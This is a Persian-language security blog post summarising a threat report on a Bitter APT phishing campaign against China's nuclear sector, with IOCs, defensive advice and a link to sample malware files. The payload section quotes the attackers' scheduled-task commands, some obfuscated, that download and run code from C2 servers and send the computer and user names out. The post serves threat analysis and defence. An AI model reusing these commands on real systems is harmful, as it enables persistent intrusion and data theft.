Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید

صنعت هسته ای چین هدف Bitter APT + فایلهای نمونه

On فروردین 16, 1402فروردین 28, 1402
seyyid
Share
زمان مطالعه: 5 دقیقه

محققای Intezer یه گزارشی در خصوص کمپین فیشینگ گروه Bitter APT منتشر کردن که صنایع هسته ای چین رو هدف قرار داده.

این محققا براساس TTPهایی که از این گروه منتشر شده، این حملات بهشون نسبت دادن. این گروه ، یه بازیگر تهدید آسیای جنوبی هستش و معمولا بخش های انرژی و دولتی رو هدف قرار میده. قبلا پاکستان ، چین و بنگلادش و عربستان رو هدف قرار داده بودن. تقریبا از سال 2013 فعال هستن.

 

بررسی فیشینگ و پیلودها :

محققا 7 ایمیل پیدا کردن که وانمود میکردن از سفارت قرقیزستان هستن و برای افرادی در صنعت هسته چین ارسال شده بودن. در برخی ایمیلها افراد و نهادهای دانشگاهی که مرتبط با صنعت هسته ای هستن هم مورد هدف قرار گرفتن. این ایمیلها از این افراد دعوت میکنه تا در کنفرانسهایی که مرتبط با اونا هستش ، شرکت کنن. ایمیلها حاوی یه پیوست rar هستن که توشون پیلود اکسل یا Microsoft Compiled HTML Help (CHM) هستش.

 

Bitter-APT

 

تکنیکهای مهندسی اجتماعی در ایمیلهای فیشینگ:

در ایمیلهای فیشینگ ارسالی یسری تکنیک مهندسی احتماعی استفاده شده. مثلا نام و آدرس ایمیل به گونه ای انتخاب شدن که انگار از یه سفارت در پکن اومدن. از یه ارائه دهنده ایمیل رایگان استفاده کردن بنابراین بررسی سابقه دامنه به درد نمیخوره.

 

تکنیک مهندسی اجتماعی Bitter-APT

 

ایمیل با نام و مشخصات واقعی یه فرد عضو سفارت قرقیزستان در چین ارسال شده. اگه گیرنده این مشخصات گوگل کنه، به اطلاعات واقعی در لینکدین و سایت وزارت خارجه میرسه در نتیجه اعتماد میکنه. احتمالا بازیگر تهدید هم از این طریق این اطلاعات بدست آورده.

در موضوع ایمیل و متن اون کلماتی مانند IAEA و CIIS و دکترین هسته ای و … استفاده شده که برای گیرنده در بخش صنعت هسته ای آشنا باشه.

 

پیلودهای مخرب CHM و اکسل :

پیلودهای مختلفی در این کمپین مشاهده شده از جمله فایلهای CHM و اکسل و اکسپلویتهای Equation Editor . این فایلهای مخرب در داخل rar تحویل قربانی داده میشه تا بخشی از آنالیز استاتیک دور بزنن. هدفشون هم پرسیست و دانلود پیلودهای بعدی هستش. البته محققا نتونستن پیلودهای بعدی رو پیدا کنن و فقط از طریق یسری C2 فعال ، اسماشون رو شناسایی کردن.

فایلهای اکسل حاوی اکسپلویت Equation Editor هستن که دوتا scheduled task مختلف ایجاد میکنه. یکی از این scheduled task ها که در زیر میبینید، هر 15 دقیقه اجرا میشه و یه EXE رو با cURL دانلود میکنه و همچنین اسم سیستم رو به مهاجم ارسال میکنه. این تکنیکها توسط این بازیگر در سال 2021/2022 هم مورد استفاده قرار گرفته.

 

1
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 15 /TN \Windows\DWM\DWMCORE /TR "cmd /c start /min curl --output %AppData%\dwmcor.exe -O ""https://qwavemediaservice[.]net/hkcu/qt.php/?dt=%computername%-QT-2&ct=QT""" /f

 

پیلود Bitter-APT

 

scheduled task دومی سعی میکنه پیلودی که scheduled task قبلی دانلود کرده رو اجرا کنه.

 

1
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 20 /TN \Windows\DWM\DWMCORELIB /TR "%AppData%\dwmcor.exe" /f

 

اما متداولترین پیلود در فایلهای RAR فایلهای Microsoft Compiled HTML Help (CHM) هستن. از این فایلها میشه برای اجرای کد دلخواه استفاده کرد ، در این مورد مهاجمین از این فایلها برای ایجاد scheduled task برای پرسیست و دانلود پیلود مرحله بعدی استفاده کردن.

این فایلها با توجه به اینکه نیاز به تعامل کم کاربر دارن، نیاز به نسخه های آسیب پذیر آفیس ندارن و همچنین چون از فشرده سازی LZX استفاده میکنن برخی تکنیکهای آنالیز استایک رو دور میزنن، برای مهاجم میتونه مفید باشه.

اولین نسخه CHM یه scheduled task ایجاد میکنه که با استفاده از تکنیک living off the land و فایل msiexec یه فایل MSI در سرور C2 رو اجرا میکنه. از تکنیک String concatenation برای مبهم سازی استفاده میکنه. نام کاربری و نام کامپیوتر به سرور C2 ارسال میکنه.

 

1
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i htt^p:/^/mirz^adih^atti^[.]com^/cs^s/t^ry.php?h=%computername%*%username% /^q^n ^/^norestart" /ft

 

محققا نتونستن این فایلهای MSI رو بدست بیارن و صرفا اسماشون رو شناسایی کردن (سایزشون 0 بوده):

 

Bitter-APT msi

 

با این حرکت مهاجم با بررسی تارگت ، وقت داشته که این فایلهای خالی رو با فایل واقعی جایگزین کنه و در نتیجه از فایلهای مراحل بعدی حمله محافظت کنه.

این گروه احتمالا تاکتیکهای سال 2021 عوض نکردن و بنابراین احتمالا یه دانلودر اجرا میکنه که ماژول های مختلفی مانند کیلاگر ، RAT و … دانلود و اجرا میکنه.

فایل CHM دوم همون مراحل با پاورشل انجام میده و از یسری تکنیکهای دیگه برای مبهم سازی استفاده میکنه.

 

Bitter-APT powershell

 

دستور دیکد شده بالا :

 

1
schtasks /create /tn WinSecurity /sc minute /mo 15 /tr "powershell.exe -WindowStyle Hidden -command curl -o %LOCALAPPDATA%\pic.jpg https://coauthcn[.]com/hbz.php?id=%computername%;timeout 9;more %LOCALAPPDATA%\pic.jpg|powershell;timeout 9;del %LOCALAPPDATA%\pic.jpg" /f

 

در این نسخه فقط نام کامپیوتر به C2 ارسال میشه و هنگام باز شدن یه تصویر برای فریب کاربر نشون داده میشه:

 

Bitter-APT تصویر جعلی

 

تصویر بالا اشاره به جبهه متحد کمیته مرکزی حزب کمونیست چین داره که در شکل زیر یه ترجمه ازش میبینید :

 

Bitter-APT-china

 

توصیه شده نهادهای دولتی ، انرژی و مهندسی بخصوص اونایی که در آسیا و اقیانوسیه هستن، هنگام دریافت ایمیل از سایر نهادهای دیپلماتیک هوشیار باشن. همیشه اطیمنان حاصل کنن که فرستنده مورد اطمینانه و به این نکته هم توجه کنن که ممکنه فرد ادعا کنه که شخص خاصیه اما اینطور نباشه.

تکنیکهای مهندسی اجتماعی استفاده شده ، هیچکدوم جدید نیستن و بنابراین نیازه که پرسنل آموزش داده بشن تا جلوی این حملات فریب نخورن.

در باز کردن فایلهای پیوست ایمیلها هوشیار باشید و هرگز فایلهای CHM باز نکنید ، چون این فایلها قدیمی هستن و برای مقاصد قانونی و رسمی دیگه استفاده نمیشن.

 

فایلهای نمونه :

برای تحلیل و تمرین بیشتر ، میتونید فایلهای این گزارش از اینجا دانلود کنید.

 

IOCهای گزارش:

5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1 (Email)

eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e (Email)

cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179 (Email)

8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74 (Email)

33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799  (Email)

5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc (Email)

Ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1 (Email)

b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa (RAR)

33a20950e7f4b2191706ddf9089f1e91be1e5384cca00a57cf6b58056f70c96b (RAR)

7e7e90b076ef3ea4ef8ed4ef14fb599a2acb15d9ce00c78e5949186da1e355cf (RAR)

07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88 (XLS)

06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431 (CHM)

ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446 (CHM)

Network

qwavemediaservice[.]net

mirzadihatti[.]com

coauthcn[.]com

 

 

منبع

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آنالیز بدافزار اخبار بازیگران تهدیدIn Bitter APT , CHM , Intezer , Microsoft Compiled HTML Help , اکسپلویت Equation Editor , فیشینگ

راهبری نوشته

استفاده از آسیب پذیری Zimbra برای هک پورتالهای Webmail کشورهای اروپایی همسو با ناتو
توقیف دامنه های Genesis توسط FBI

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • آسیب پذیری امنیتی
  • اخبار
  • باگ بانتی
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
seyyid
On آذر 6, 1402آذر 6, 1402

برنامه باگ بانتی مایکروسافت برای Defender

  • اخبار
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
seyyid
On خرداد 31, 1402خرداد 31, 1402

دومین کنفرانس فضای سایبر

  • اخبار
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
seyyid
On بهمن 7, 1401فروردین 28, 1402

هک و امنیت دستگاههای موبایل

  • Osint
  • آسیب پذیری امنیتی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • بازیگران تهدید
  • باگ بانتی
seyyid
On اسفند 2, 1402اسفند 3, 1402

ادامه دستگیری و توقیف ها علیه گروه باج افزار لاک بیت

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404